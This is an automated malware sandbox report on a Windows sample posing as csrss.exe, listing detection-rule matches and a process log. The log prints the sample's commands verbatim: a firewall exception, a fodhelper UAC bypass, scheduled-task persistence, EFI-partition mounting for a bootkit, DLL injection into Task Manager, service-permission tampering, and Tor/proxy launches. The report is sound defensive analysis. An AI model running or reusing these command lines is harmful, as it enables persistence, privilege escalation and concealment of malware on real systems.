Source: 20.3.csrss.exe.431bb00.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 43.3.csrss.exe.431bb00.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 55.3.csrss.exe.431bb00.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 61.3.csrss.exe.4321700.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 61.3.csrss.exe.431bb00.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 20.3.csrss.exe.4331420.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 4.3.kdsyitkxmS.exe.40abb00.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 50.3.csrss.exe.4321700.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0000003A.00000003.208966850463.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0000003D.00000003.209030995606.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000037.00000003.208942288673.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Deletes files inside the Windows folder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_by2l5cwc.djl.ps1
Creates files inside the system directory
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File created: C:\Windows\rss Jump to behavior
PE file does not import any functions
Source: bootx64.efi.20.dr Static PE information: No import functions for PE file found
Source: bootmgfw.efi.20.dr Static PE information: No import functions for PE file found
Source: EfiGuardDxe.efi.20.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs kdsyitkxmS.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\servicing\TrustedInstaller.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe Section loaded: edgegdi.dll
Enables security privileges
Source: C:\Windows\SysWOW64\sc.exe Process token adjusted: Security
PE / OLE file has an invalid certificate
Source: kdsyitkxmS.exe Static PE information: invalid certificate
PE file contains more sections than normal
Source: zlib1.dll.20.dr Static PE information: Number of sections : 11 > 10
Source: libssp-0.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libevent_core-2-1-7.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libssl-1_1.dll.20.dr Static PE information: Number of sections : 19 > 10
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libcrypto-1_1.dll.20.dr Static PE information: Number of sections : 19 > 10
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libwinpthread-1.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libevent-2-1-7.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: kdsyitkxmS.exe Virustotal: Detection: 31%
Source: kdsyitkxmS.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File read: C:\Users\user\Desktop\kdsyitkxmS.exe Jump to behavior
Source: kdsyitkxmS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
Source: unknown Process created: C:\Users\user\Desktop\kdsyitkxmS.exe C:\Users\user\Desktop\kdsyitkxmS.exe
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Users\user\Desktop\kdsyitkxmS.exe C:\Users\user\Desktop\kdsyitkxmS.exe
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
Source: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5 Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466 Jump to behavior
